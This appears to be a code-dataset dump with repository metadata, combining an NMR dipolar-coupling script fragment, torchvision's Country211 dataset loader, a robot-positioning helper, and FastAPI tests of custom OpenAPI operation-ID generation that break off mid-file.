print('1H-e (1A): {:> 8.1f} MHz'.format(DCC('1H','e', 1.0)/(1E6*2.*pi)))
print('1H-e (5A): {:> 8.1f} kHz'.format(DCC('1H','e', 5.0)/(1E3*2.*pi)))
print('1H-e (10A): {:> 8.1f} kHz'.format(DCC('1H','e', 10.0)/(1E3*2.*pi)))
print('1H-e (50A): {:> 8.1f} kHz'.format(DCC('1H','e', 50.0)/(1E3*2.*pi)))
print('1H-e (100A): {:> 8.1f} Hz'.format(DCC('1H','e', 100.0)/(2.*pi)))
print('-'*30)
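For context, the DCC lambda above implements the standard static dipolar coupling constant in SI units; a worked value for the amide 1H-15N pair, matching the script's first printed line, is:

    d_{IS} = -\frac{\mu_0}{4\pi} \frac{\gamma_I \gamma_S \hbar}{r_{IS}^{3}}
    \qquad\Rightarrow\qquad
    \frac{d_{\mathrm{^{1}H{-}^{15}N}}(r = 1.02\,\text{Å})}{2\pi} \approx +11.5\ \text{kHz}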
| 34.142857
| 89
| 0.502092
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 647
| 0.451185
|
0b4dc3067343c33e32c44d539a787edba0c40515
| 2,197
|
py
|
Python
|
torchvision/prototype/datasets/_builtin/country211.py
|
SariaCxs/vision
|
1db8795733b91cd6dd62a0baa7ecbae6790542bc
|
[
"BSD-3-Clause"
] | 1
|
2022-03-31T02:37:35.000Z
|
2022-03-31T02:37:35.000Z
|
torchvision/prototype/datasets/_builtin/country211.py
|
SariaCxs/vision
|
1db8795733b91cd6dd62a0baa7ecbae6790542bc
|
[
"BSD-3-Clause"
] | null | null | null |
torchvision/prototype/datasets/_builtin/country211.py
|
SariaCxs/vision
|
1db8795733b91cd6dd62a0baa7ecbae6790542bc
|
[
"BSD-3-Clause"
] | null | null | null |
import pathlib
from typing import Any, Dict, List, Tuple
from torchdata.datapipes.iter import IterDataPipe, Mapper, Filter
from torchvision.prototype.datasets.utils import Dataset, DatasetConfig, DatasetInfo, HttpResource, OnlineResource
from torchvision.prototype.datasets.utils._internal import path_comparator, hint_sharding, hint_shuffling
from torchvision.prototype.features import EncodedImage, Label
class Country211(Dataset):
def _make_info(self) -> DatasetInfo:
return DatasetInfo(
"country211",
homepage="https://github.com/openai/CLIP/blob/main/data/country211.md",
valid_options=dict(split=("train", "val", "test")),
)
def resources(self, config: DatasetConfig) -> List[OnlineResource]:
return [
HttpResource(
"https://openaipublic.azureedge.net/clip/data/country211.tgz",
sha256="c011343cdc1296a8c31ff1d7129cf0b5e5b8605462cffd24f89266d6e6f4da3c",
)
]
_SPLIT_NAME_MAPPER = {
"train": "train",
"val": "valid",
"test": "test",
}
def _prepare_sample(self, data: Tuple[str, Any]) -> Dict[str, Any]:
path, buffer = data
category = pathlib.Path(path).parent.name
return dict(
label=Label.from_category(category, categories=self.categories),
path=path,
image=EncodedImage.from_file(buffer),
)
    def _filter_split(self, data: Tuple[str, Any], *, split: str) -> bool:
        # appears unused in this file: _make_datapipe below filters via path_comparator instead
        return pathlib.Path(data[0]).parent.parent.name == split
def _make_datapipe(
self, resource_dps: List[IterDataPipe], *, config: DatasetConfig
) -> IterDataPipe[Dict[str, Any]]:
dp = resource_dps[0]
dp = Filter(dp, path_comparator("parent.parent.name", self._SPLIT_NAME_MAPPER[config.split]))
dp = hint_shuffling(dp)
dp = hint_sharding(dp)
return Mapper(dp, self._prepare_sample)
def _generate_categories(self, root: pathlib.Path) -> List[str]:
resources = self.resources(self.default_config)
dp = resources[0].load(root)
return sorted({pathlib.Path(path).parent.name for path, _ in dp})
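A usage sketch for the dataset class above. Hedged: the torchvision prototype datasets API shifted between releases, so the load entry point shown here is illustrative rather than guaranteed for the exact revision vendored above:
# from torchvision.prototype import datasets
# dataset = datasets.load("country211", split="val")   # split is one of "train", "val", "test"
# sample = next(iter(dataset))
# sample["label"], sample["path"], sample["image"]     # keys produced by _prepare_sample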
| 38.54386
| 114
| 0.65817
| 1,786
| 0.812927
| 0
| 0
| 0
| 0
| 0
| 0
| 276
| 0.125626
|
0b5048a8c70006e924308165169ee5c4fabe48fa
| 934
|
py
|
Python
|
asar_pi_applications/asar_vision/robot_distance_incorrect.py
|
ssnover/msd-p18542
|
32bef466f9d5ba55429da2119a14081b3e411d0b
|
[
"MIT"
] | 3
|
2021-01-07T07:46:50.000Z
|
2021-11-17T10:48:39.000Z
|
asar_pi_applications/asar_vision/robot_distance_incorrect.py
|
ssnover/msd-p18542
|
32bef466f9d5ba55429da2119a14081b3e411d0b
|
[
"MIT"
] | 3
|
2018-02-19T20:30:30.000Z
|
2018-04-20T23:25:29.000Z
|
asar_pi_applications/asar_vision/robot_distance_incorrect.py
|
ssnover95/msd-p18542
|
32bef466f9d5ba55429da2119a14081b3e411d0b
|
[
"MIT"
] | 1
|
2021-01-07T07:46:52.000Z
|
2021-01-07T07:46:52.000Z
|
import numpy as np
from math import sqrt
def robot_distance_incorrect(robot_actual_location, hexagon_pixel_values):
    # distance (in pixels) from the robot to every detected hexagon centre
    distances = []
    for hexagon in hexagon_pixel_values:
        dist = sqrt((robot_actual_location[0] - hexagon[0]) ** 2 +
                    (robot_actual_location[1] - hexagon[1]) ** 2)
        distances.append(dist)
    index_min = np.argmin(distances)
    correct_position = hexagon_pixel_values[index_min]
    # find the distance that needs to be traveled to get to the correct location
    pixel_distance = (correct_position[0] - robot_actual_location[0],
                      correct_position[1] - robot_actual_location[1])
    # print(correct_position, robot_actual_location, pixel_distance)
    # convert to actual distance; 1.79 and 1.749 are the per-axis
    # pixels-per-unit calibration factors used by this project
    distance_to_get_back = (pixel_distance[0]/1.79, pixel_distance[1]/1.749)
    return distance_to_get_back
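A smoke test for the function above, with invented coordinates chosen so the nearest hexagon is obvious:
hexagons = [(100, 100), (220, 140), (310, 260)]
robot = (225, 150)
print(robot_distance_incorrect(robot, hexagons))
# nearest hexagon is (220, 140); pixel offset (-5, -10) -> roughly (-2.79, -5.72) physical units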
| 44.47619
| 115
| 0.723769
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 168
| 0.179872
|
0b519f8596f5bf7ee53103adc8d550ce1fb62540
| 68,172
|
py
|
Python
|
tests/test_generate_unique_id_function.py
|
ssensalo/fastapi
|
146f57b8f70c5757dc20edc716dba1b96936a8d6
|
[
"MIT"
] | 1
|
2022-01-08T16:39:28.000Z
|
2022-01-08T16:39:28.000Z
|
tests/test_generate_unique_id_function.py
|
ssensalo/fastapi
|
146f57b8f70c5757dc20edc716dba1b96936a8d6
|
[
"MIT"
] | 1
|
2022-01-07T21:04:04.000Z
|
2022-01-07T21:04:04.000Z
|
tests/test_generate_unique_id_function.py
|
ssensalo/fastapi
|
146f57b8f70c5757dc20edc716dba1b96936a8d6
|
[
"MIT"
] | null | null | null |
import warnings
from typing import List
from fastapi import APIRouter, FastAPI
from fastapi.routing import APIRoute
from fastapi.testclient import TestClient
from pydantic import BaseModel
def custom_generate_unique_id(route: APIRoute):
return f"foo_{route.name}"
def custom_generate_unique_id2(route: APIRoute):
return f"bar_{route.name}"
def custom_generate_unique_id3(route: APIRoute):
return f"baz_{route.name}"
class Item(BaseModel):
name: str
price: float
class Message(BaseModel):
title: str
description: str
def test_top_level_generate_unique_id():
app = FastAPI(generate_unique_id_function=custom_generate_unique_id)
router = APIRouter()
@app.post("/", response_model=List[Item], responses={404: {"model": List[Message]}})
def post_root(item1: Item, item2: Item):
return item1, item2 # pragma: nocover
@router.post(
"/router", response_model=List[Item], responses={404: {"model": List[Message]}}
)
def post_router(item1: Item, item2: Item):
return item1, item2 # pragma: nocover
app.include_router(router)
client = TestClient(app)
response = client.get("/openapi.json")
data = response.json()
assert data == {
"openapi": "3.0.2",
"info": {"title": "FastAPI", "version": "0.1.0"},
"paths": {
"/": {
"post": {
"summary": "Post Root",
"operationId": "foo_post_root",
"requestBody": {
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/Body_foo_post_root"
}
}
},
"required": True,
},
"responses": {
"200": {
"description": "Successful Response",
"content": {
"application/json": {
"schema": {
"title": "Response Foo Post Root",
"type": "array",
"items": {"$ref": "#/components/schemas/Item"},
}
}
},
},
"404": {
"description": "Not Found",
"content": {
"application/json": {
"schema": {
"title": "Response 404 Foo Post Root",
"type": "array",
"items": {
"$ref": "#/components/schemas/Message"
},
}
}
},
},
"422": {
"description": "Validation Error",
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/HTTPValidationError"
}
}
},
},
},
}
},
"/router": {
"post": {
"summary": "Post Router",
"operationId": "foo_post_router",
"requestBody": {
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/Body_foo_post_router"
}
}
},
"required": True,
},
"responses": {
"200": {
"description": "Successful Response",
"content": {
"application/json": {
"schema": {
"title": "Response Foo Post Router",
"type": "array",
"items": {"$ref": "#/components/schemas/Item"},
}
}
},
},
"404": {
"description": "Not Found",
"content": {
"application/json": {
"schema": {
"title": "Response 404 Foo Post Router",
"type": "array",
"items": {
"$ref": "#/components/schemas/Message"
},
}
}
},
},
"422": {
"description": "Validation Error",
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/HTTPValidationError"
}
}
},
},
},
}
},
},
"components": {
"schemas": {
"Body_foo_post_root": {
"title": "Body_foo_post_root",
"required": ["item1", "item2"],
"type": "object",
"properties": {
"item1": {"$ref": "#/components/schemas/Item"},
"item2": {"$ref": "#/components/schemas/Item"},
},
},
"Body_foo_post_router": {
"title": "Body_foo_post_router",
"required": ["item1", "item2"],
"type": "object",
"properties": {
"item1": {"$ref": "#/components/schemas/Item"},
"item2": {"$ref": "#/components/schemas/Item"},
},
},
"HTTPValidationError": {
"title": "HTTPValidationError",
"type": "object",
"properties": {
"detail": {
"title": "Detail",
"type": "array",
"items": {"$ref": "#/components/schemas/ValidationError"},
}
},
},
"Item": {
"title": "Item",
"required": ["name", "price"],
"type": "object",
"properties": {
"name": {"title": "Name", "type": "string"},
"price": {"title": "Price", "type": "number"},
},
},
"Message": {
"title": "Message",
"required": ["title", "description"],
"type": "object",
"properties": {
"title": {"title": "Title", "type": "string"},
"description": {"title": "Description", "type": "string"},
},
},
"ValidationError": {
"title": "ValidationError",
"required": ["loc", "msg", "type"],
"type": "object",
"properties": {
"loc": {
"title": "Location",
"type": "array",
"items": {
"anyOf": [{"type": "string"}, {"type": "integer"}]
},
},
"msg": {"title": "Message", "type": "string"},
"type": {"title": "Error Type", "type": "string"},
},
},
}
},
}
def test_router_overrides_generate_unique_id():
app = FastAPI(generate_unique_id_function=custom_generate_unique_id)
router = APIRouter(generate_unique_id_function=custom_generate_unique_id2)
@app.post("/", response_model=List[Item], responses={404: {"model": List[Message]}})
def post_root(item1: Item, item2: Item):
return item1, item2 # pragma: nocover
@router.post(
"/router", response_model=List[Item], responses={404: {"model": List[Message]}}
)
def post_router(item1: Item, item2: Item):
return item1, item2 # pragma: nocover
app.include_router(router)
client = TestClient(app)
response = client.get("/openapi.json")
data = response.json()
assert data == {
"openapi": "3.0.2",
"info": {"title": "FastAPI", "version": "0.1.0"},
"paths": {
"/": {
"post": {
"summary": "Post Root",
"operationId": "foo_post_root",
"requestBody": {
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/Body_foo_post_root"
}
}
},
"required": True,
},
"responses": {
"200": {
"description": "Successful Response",
"content": {
"application/json": {
"schema": {
"title": "Response Foo Post Root",
"type": "array",
"items": {"$ref": "#/components/schemas/Item"},
}
}
},
},
"404": {
"description": "Not Found",
"content": {
"application/json": {
"schema": {
"title": "Response 404 Foo Post Root",
"type": "array",
"items": {
"$ref": "#/components/schemas/Message"
},
}
}
},
},
"422": {
"description": "Validation Error",
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/HTTPValidationError"
}
}
},
},
},
}
},
"/router": {
"post": {
"summary": "Post Router",
"operationId": "bar_post_router",
"requestBody": {
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/Body_bar_post_router"
}
}
},
"required": True,
},
"responses": {
"200": {
"description": "Successful Response",
"content": {
"application/json": {
"schema": {
"title": "Response Bar Post Router",
"type": "array",
"items": {"$ref": "#/components/schemas/Item"},
}
}
},
},
"404": {
"description": "Not Found",
"content": {
"application/json": {
"schema": {
"title": "Response 404 Bar Post Router",
"type": "array",
"items": {
"$ref": "#/components/schemas/Message"
},
}
}
},
},
"422": {
"description": "Validation Error",
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/HTTPValidationError"
}
}
},
},
},
}
},
},
"components": {
"schemas": {
"Body_bar_post_router": {
"title": "Body_bar_post_router",
"required": ["item1", "item2"],
"type": "object",
"properties": {
"item1": {"$ref": "#/components/schemas/Item"},
"item2": {"$ref": "#/components/schemas/Item"},
},
},
"Body_foo_post_root": {
"title": "Body_foo_post_root",
"required": ["item1", "item2"],
"type": "object",
"properties": {
"item1": {"$ref": "#/components/schemas/Item"},
"item2": {"$ref": "#/components/schemas/Item"},
},
},
"HTTPValidationError": {
"title": "HTTPValidationError",
"type": "object",
"properties": {
"detail": {
"title": "Detail",
"type": "array",
"items": {"$ref": "#/components/schemas/ValidationError"},
}
},
},
"Item": {
"title": "Item",
"required": ["name", "price"],
"type": "object",
"properties": {
"name": {"title": "Name", "type": "string"},
"price": {"title": "Price", "type": "number"},
},
},
"Message": {
"title": "Message",
"required": ["title", "description"],
"type": "object",
"properties": {
"title": {"title": "Title", "type": "string"},
"description": {"title": "Description", "type": "string"},
},
},
"ValidationError": {
"title": "ValidationError",
"required": ["loc", "msg", "type"],
"type": "object",
"properties": {
"loc": {
"title": "Location",
"type": "array",
"items": {
"anyOf": [{"type": "string"}, {"type": "integer"}]
},
},
"msg": {"title": "Message", "type": "string"},
"type": {"title": "Error Type", "type": "string"},
},
},
}
},
}
def test_router_include_overrides_generate_unique_id():
app = FastAPI(generate_unique_id_function=custom_generate_unique_id)
router = APIRouter(generate_unique_id_function=custom_generate_unique_id2)
@app.post("/", response_model=List[Item], responses={404: {"model": List[Message]}})
def post_root(item1: Item, item2: Item):
return item1, item2 # pragma: nocover
@router.post(
"/router", response_model=List[Item], responses={404: {"model": List[Message]}}
)
def post_router(item1: Item, item2: Item):
return item1, item2 # pragma: nocover
app.include_router(router, generate_unique_id_function=custom_generate_unique_id3)
client = TestClient(app)
response = client.get("/openapi.json")
data = response.json()
assert data == {
"openapi": "3.0.2",
"info": {"title": "FastAPI", "version": "0.1.0"},
"paths": {
"/": {
"post": {
"summary": "Post Root",
"operationId": "foo_post_root",
"requestBody": {
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/Body_foo_post_root"
}
}
},
"required": True,
},
"responses": {
"200": {
"description": "Successful Response",
"content": {
"application/json": {
"schema": {
"title": "Response Foo Post Root",
"type": "array",
"items": {"$ref": "#/components/schemas/Item"},
}
}
},
},
"404": {
"description": "Not Found",
"content": {
"application/json": {
"schema": {
"title": "Response 404 Foo Post Root",
"type": "array",
"items": {
"$ref": "#/components/schemas/Message"
},
}
}
},
},
"422": {
"description": "Validation Error",
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/HTTPValidationError"
}
}
},
},
},
}
},
"/router": {
"post": {
"summary": "Post Router",
"operationId": "bar_post_router",
"requestBody": {
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/Body_bar_post_router"
}
}
},
"required": True,
},
"responses": {
"200": {
"description": "Successful Response",
"content": {
"application/json": {
"schema": {
"title": "Response Bar Post Router",
"type": "array",
"items": {"$ref": "#/components/schemas/Item"},
}
}
},
},
"404": {
"description": "Not Found",
"content": {
"application/json": {
"schema": {
"title": "Response 404 Bar Post Router",
"type": "array",
"items": {
"$ref": "#/components/schemas/Message"
},
}
}
},
},
"422": {
"description": "Validation Error",
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/HTTPValidationError"
}
}
},
},
},
}
},
},
"components": {
"schemas": {
"Body_bar_post_router": {
"title": "Body_bar_post_router",
"required": ["item1", "item2"],
"type": "object",
"properties": {
"item1": {"$ref": "#/components/schemas/Item"},
"item2": {"$ref": "#/components/schemas/Item"},
},
},
"Body_foo_post_root": {
"title": "Body_foo_post_root",
"required": ["item1", "item2"],
"type": "object",
"properties": {
"item1": {"$ref": "#/components/schemas/Item"},
"item2": {"$ref": "#/components/schemas/Item"},
},
},
"HTTPValidationError": {
"title": "HTTPValidationError",
"type": "object",
"properties": {
"detail": {
"title": "Detail",
"type": "array",
"items": {"$ref": "#/components/schemas/ValidationError"},
}
},
},
"Item": {
"title": "Item",
"required": ["name", "price"],
"type": "object",
"properties": {
"name": {"title": "Name", "type": "string"},
"price": {"title": "Price", "type": "number"},
},
},
"Message": {
"title": "Message",
"required": ["title", "description"],
"type": "object",
"properties": {
"title": {"title": "Title", "type": "string"},
"description": {"title": "Description", "type": "string"},
},
},
"ValidationError": {
"title": "ValidationError",
"required": ["loc", "msg", "type"],
"type": "object",
"properties": {
"loc": {
"title": "Location",
"type": "array",
"items": {
"anyOf": [{"type": "string"}, {"type": "integer"}]
},
},
"msg": {"title": "Message", "type": "string"},
"type": {"title": "Error Type", "type": "string"},
},
},
}
},
}
def test_subrouter_top_level_include_overrides_generate_unique_id():
app = FastAPI(generate_unique_id_function=custom_generate_unique_id)
router = APIRouter()
sub_router = APIRouter(generate_unique_id_function=custom_generate_unique_id2)
@app.post("/", response_model=List[Item], responses={404: {"model": List[Message]}})
def post_root(item1: Item, item2: Item):
return item1, item2 # pragma: nocover
@router.post(
"/router", response_model=List[Item], responses={404: {"model": List[Message]}}
)
def post_router(item1: Item, item2: Item):
return item1, item2 # pragma: nocover
@sub_router.post(
"/subrouter",
response_model=List[Item],
responses={404: {"model": List[Message]}},
)
def post_subrouter(item1: Item, item2: Item):
return item1, item2 # pragma: nocover
router.include_router(sub_router)
app.include_router(router, generate_unique_id_function=custom_generate_unique_id3)
client = TestClient(app)
response = client.get("/openapi.json")
data = response.json()
assert data == {
"openapi": "3.0.2",
"info": {"title": "FastAPI", "version": "0.1.0"},
"paths": {
"/": {
"post": {
"summary": "Post Root",
"operationId": "foo_post_root",
"requestBody": {
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/Body_foo_post_root"
}
}
},
"required": True,
},
"responses": {
"200": {
"description": "Successful Response",
"content": {
"application/json": {
"schema": {
"title": "Response Foo Post Root",
"type": "array",
"items": {"$ref": "#/components/schemas/Item"},
}
}
},
},
"404": {
"description": "Not Found",
"content": {
"application/json": {
"schema": {
"title": "Response 404 Foo Post Root",
"type": "array",
"items": {
"$ref": "#/components/schemas/Message"
},
}
}
},
},
"422": {
"description": "Validation Error",
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/HTTPValidationError"
}
}
},
},
},
}
},
"/router": {
"post": {
"summary": "Post Router",
"operationId": "baz_post_router",
"requestBody": {
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/Body_baz_post_router"
}
}
},
"required": True,
},
"responses": {
"200": {
"description": "Successful Response",
"content": {
"application/json": {
"schema": {
"title": "Response Baz Post Router",
"type": "array",
"items": {"$ref": "#/components/schemas/Item"},
}
}
},
},
"404": {
"description": "Not Found",
"content": {
"application/json": {
"schema": {
"title": "Response 404 Baz Post Router",
"type": "array",
"items": {
"$ref": "#/components/schemas/Message"
},
}
}
},
},
"422": {
"description": "Validation Error",
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/HTTPValidationError"
}
}
},
},
},
}
},
"/subrouter": {
"post": {
"summary": "Post Subrouter",
"operationId": "bar_post_subrouter",
"requestBody": {
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/Body_bar_post_subrouter"
}
}
},
"required": True,
},
"responses": {
"200": {
"description": "Successful Response",
"content": {
"application/json": {
"schema": {
"title": "Response Bar Post Subrouter",
"type": "array",
"items": {"$ref": "#/components/schemas/Item"},
}
}
},
},
"404": {
"description": "Not Found",
"content": {
"application/json": {
"schema": {
"title": "Response 404 Bar Post Subrouter",
"type": "array",
"items": {
"$ref": "#/components/schemas/Message"
},
}
}
},
},
"422": {
"description": "Validation Error",
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/HTTPValidationError"
}
}
},
},
},
}
},
},
"components": {
"schemas": {
"Body_bar_post_subrouter": {
"title": "Body_bar_post_subrouter",
"required": ["item1", "item2"],
"type": "object",
"properties": {
"item1": {"$ref": "#/components/schemas/Item"},
"item2": {"$ref": "#/components/schemas/Item"},
},
},
"Body_baz_post_router": {
"title": "Body_baz_post_router",
"required": ["item1", "item2"],
"type": "object",
"properties": {
"item1": {"$ref": "#/components/schemas/Item"},
"item2": {"$ref": "#/components/schemas/Item"},
},
},
"Body_foo_post_root": {
"title": "Body_foo_post_root",
"required": ["item1", "item2"],
"type": "object",
"properties": {
"item1": {"$ref": "#/components/schemas/Item"},
"item2": {"$ref": "#/components/schemas/Item"},
},
},
"HTTPValidationError": {
"title": "HTTPValidationError",
"type": "object",
"properties": {
"detail": {
"title": "Detail",
"type": "array",
"items": {"$ref": "#/components/schemas/ValidationError"},
}
},
},
"Item": {
"title": "Item",
"required": ["name", "price"],
"type": "object",
"properties": {
"name": {"title": "Name", "type": "string"},
"price": {"title": "Price", "type": "number"},
},
},
"Message": {
"title": "Message",
"required": ["title", "description"],
"type": "object",
"properties": {
"title": {"title": "Title", "type": "string"},
"description": {"title": "Description", "type": "string"},
},
},
"ValidationError": {
"title": "ValidationError",
"required": ["loc", "msg", "type"],
"type": "object",
"properties": {
"loc": {
"title": "Location",
"type": "array",
"items": {
"anyOf": [{"type": "string"}, {"type": "integer"}]
},
},
"msg": {"title": "Message", "type": "string"},
"type": {"title": "Error Type", "type": "string"},
},
},
}
},
}
def test_router_path_operation_overrides_generate_unique_id():
app = FastAPI(generate_unique_id_function=custom_generate_unique_id)
router = APIRouter(generate_unique_id_function=custom_generate_unique_id2)
@app.post("/", response_model=List[Item], responses={404: {"model": List[Message]}})
def post_root(item1: Item, item2: Item):
return item1, item2 # pragma: nocover
@router.post(
"/router",
response_model=List[Item],
responses={404: {"model": List[Message]}},
generate_unique_id_function=custom_generate_unique_id3,
)
def post_router(item1: Item, item2: Item):
return item1, item2 # pragma: nocover
app.include_router(router)
client = TestClient(app)
response = client.get("/openapi.json")
data = response.json()
assert data == {
"openapi": "3.0.2",
"info": {"title": "FastAPI", "version": "0.1.0"},
"paths": {
"/": {
"post": {
"summary": "Post Root",
"operationId": "foo_post_root",
"requestBody": {
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/Body_foo_post_root"
}
}
},
"required": True,
},
"responses": {
"200": {
"description": "Successful Response",
"content": {
"application/json": {
"schema": {
"title": "Response Foo Post Root",
"type": "array",
"items": {"$ref": "#/components/schemas/Item"},
}
}
},
},
"404": {
"description": "Not Found",
"content": {
"application/json": {
"schema": {
"title": "Response 404 Foo Post Root",
"type": "array",
"items": {
"$ref": "#/components/schemas/Message"
},
}
}
},
},
"422": {
"description": "Validation Error",
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/HTTPValidationError"
}
}
},
},
},
}
},
"/router": {
"post": {
"summary": "Post Router",
"operationId": "baz_post_router",
"requestBody": {
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/Body_baz_post_router"
}
}
},
"required": True,
},
"responses": {
"200": {
"description": "Successful Response",
"content": {
"application/json": {
"schema": {
"title": "Response Baz Post Router",
"type": "array",
"items": {"$ref": "#/components/schemas/Item"},
}
}
},
},
"404": {
"description": "Not Found",
"content": {
"application/json": {
"schema": {
"title": "Response 404 Baz Post Router",
"type": "array",
"items": {
"$ref": "#/components/schemas/Message"
},
}
}
},
},
"422": {
"description": "Validation Error",
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/HTTPValidationError"
}
}
},
},
},
}
},
},
"components": {
"schemas": {
"Body_baz_post_router": {
"title": "Body_baz_post_router",
"required": ["item1", "item2"],
"type": "object",
"properties": {
"item1": {"$ref": "#/components/schemas/Item"},
"item2": {"$ref": "#/components/schemas/Item"},
},
},
"Body_foo_post_root": {
"title": "Body_foo_post_root",
"required": ["item1", "item2"],
"type": "object",
"properties": {
"item1": {"$ref": "#/components/schemas/Item"},
"item2": {"$ref": "#/components/schemas/Item"},
},
},
"HTTPValidationError": {
"title": "HTTPValidationError",
"type": "object",
"properties": {
"detail": {
"title": "Detail",
"type": "array",
"items": {"$ref": "#/components/schemas/ValidationError"},
}
},
},
"Item": {
"title": "Item",
"required": ["name", "price"],
"type": "object",
"properties": {
"name": {"title": "Name", "type": "string"},
"price": {"title": "Price", "type": "number"},
},
},
"Message": {
"title": "Message",
"required": ["title", "description"],
"type": "object",
"properties": {
"title": {"title": "Title", "type": "string"},
"description": {"title": "Description", "type": "string"},
},
},
"ValidationError": {
"title": "ValidationError",
"required": ["loc", "msg", "type"],
"type": "object",
"properties": {
"loc": {
"title": "Location",
"type": "array",
"items": {
"anyOf": [{"type": "string"}, {"type": "integer"}]
},
},
"msg": {"title": "Message", "type": "string"},
"type": {"title": "Error Type", "type": "string"},
},
},
}
},
}
def test_app_path_operation_overrides_generate_unique_id():
app = FastAPI(generate_unique_id_function=custom_generate_unique_id)
router = APIRouter(generate_unique_id_function=custom_generate_unique_id2)
@app.post(
"/",
response_model=List[Item],
responses={404: {"model": List[Message]}},
generate_unique_id_function=custom_generate_unique_id3,
)
def post_root(item1: Item, item2: Item):
return item1, item2 # pragma: nocover
@router.post(
"/router",
response_model=List[Item],
responses={404: {"model": List[Message]}},
)
def post_router(item1: Item, item2: Item):
return item1, item2 # pragma: nocover
app.include_router(router)
client = TestClient(app)
response = client.get("/openapi.json")
data = response.json()
assert data == {
"openapi": "3.0.2",
"info": {"title": "FastAPI", "version": "0.1.0"},
"paths": {
"/": {
"post": {
"summary": "Post Root",
"operationId": "baz_post_root",
"requestBody": {
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/Body_baz_post_root"
}
}
},
"required": True,
},
"responses": {
"200": {
"description": "Successful Response",
"content": {
"application/json": {
"schema": {
"title": "Response Baz Post Root",
"type": "array",
"items": {"$ref": "#/components/schemas/Item"},
}
}
},
},
"404": {
"description": "Not Found",
"content": {
"application/json": {
"schema": {
"title": "Response 404 Baz Post Root",
"type": "array",
"items": {
"$ref": "#/components/schemas/Message"
},
}
}
},
},
"422": {
"description": "Validation Error",
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/HTTPValidationError"
}
}
},
},
},
}
},
"/router": {
"post": {
"summary": "Post Router",
"operationId": "bar_post_router",
"requestBody": {
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/Body_bar_post_router"
}
}
},
"required": True,
},
"responses": {
"200": {
"description": "Successful Response",
"content": {
"application/json": {
"schema": {
"title": "Response Bar Post Router",
"type": "array",
"items": {"$ref": "#/components/schemas/Item"},
}
}
},
},
"404": {
"description": "Not Found",
"content": {
"application/json": {
"schema": {
"title": "Response 404 Bar Post Router",
"type": "array",
"items": {
"$ref": "#/components/schemas/Message"
},
}
}
},
},
"422": {
"description": "Validation Error",
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/HTTPValidationError"
}
}
},
},
},
}
},
},
"components": {
"schemas": {
"Body_bar_post_router": {
"title": "Body_bar_post_router",
"required": ["item1", "item2"],
"type": "object",
"properties": {
"item1": {"$ref": "#/components/schemas/Item"},
"item2": {"$ref": "#/components/schemas/Item"},
},
},
"Body_baz_post_root": {
"title": "Body_baz_post_root",
"required": ["item1", "item2"],
"type": "object",
"properties": {
"item1": {"$ref": "#/components/schemas/Item"},
"item2": {"$ref": "#/components/schemas/Item"},
},
},
"HTTPValidationError": {
"title": "HTTPValidationError",
"type": "object",
"properties": {
"detail": {
"title": "Detail",
"type": "array",
"items": {"$ref": "#/components/schemas/ValidationError"},
}
},
},
"Item": {
"title": "Item",
"required": ["name", "price"],
"type": "object",
"properties": {
"name": {"title": "Name", "type": "string"},
"price": {"title": "Price", "type": "number"},
},
},
"Message": {
"title": "Message",
"required": ["title", "description"],
"type": "object",
"properties": {
"title": {"title": "Title", "type": "string"},
"description": {"title": "Description", "type": "string"},
},
},
"ValidationError": {
"title": "ValidationError",
"required": ["loc", "msg", "type"],
"type": "object",
"properties": {
"loc": {
"title": "Location",
"type": "array",
"items": {
"anyOf": [{"type": "string"}, {"type": "integer"}]
},
},
"msg": {"title": "Message", "type": "string"},
"type": {"title": "Error Type", "type": "string"},
},
},
}
},
}
def test_callback_override_generate_unique_id():
app = FastAPI(generate_unique_id_function=custom_generate_unique_id)
callback_router = APIRouter(generate_unique_id_function=custom_generate_unique_id2)
@callback_router.post(
"/post-callback",
response_model=List[Item],
responses={404: {"model": List[Message]}},
generate_unique_id_function=custom_generate_unique_id3,
)
def post_callback(item1: Item, item2: Item):
return item1, item2 # pragma: nocover
@app.post(
"/",
response_model=List[Item],
responses={404: {"model": List[Message]}},
generate_unique_id_function=custom_generate_unique_id3,
callbacks=callback_router.routes,
)
def post_root(item1: Item, item2: Item):
return item1, item2 # pragma: nocover
@app.post(
"/tocallback",
response_model=List[Item],
responses={404: {"model": List[Message]}},
)
def post_with_callback(item1: Item, item2: Item):
return item1, item2 # pragma: nocover
client = TestClient(app)
response = client.get("/openapi.json")
data = response.json()
assert data == {
"openapi": "3.0.2",
"info": {"title": "FastAPI", "version": "0.1.0"},
"paths": {
"/": {
"post": {
"summary": "Post Root",
"operationId": "baz_post_root",
"requestBody": {
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/Body_baz_post_root"
}
}
},
"required": True,
},
"responses": {
"200": {
"description": "Successful Response",
"content": {
"application/json": {
"schema": {
"title": "Response Baz Post Root",
"type": "array",
"items": {"$ref": "#/components/schemas/Item"},
}
}
},
},
"404": {
"description": "Not Found",
"content": {
"application/json": {
"schema": {
"title": "Response 404 Baz Post Root",
"type": "array",
"items": {
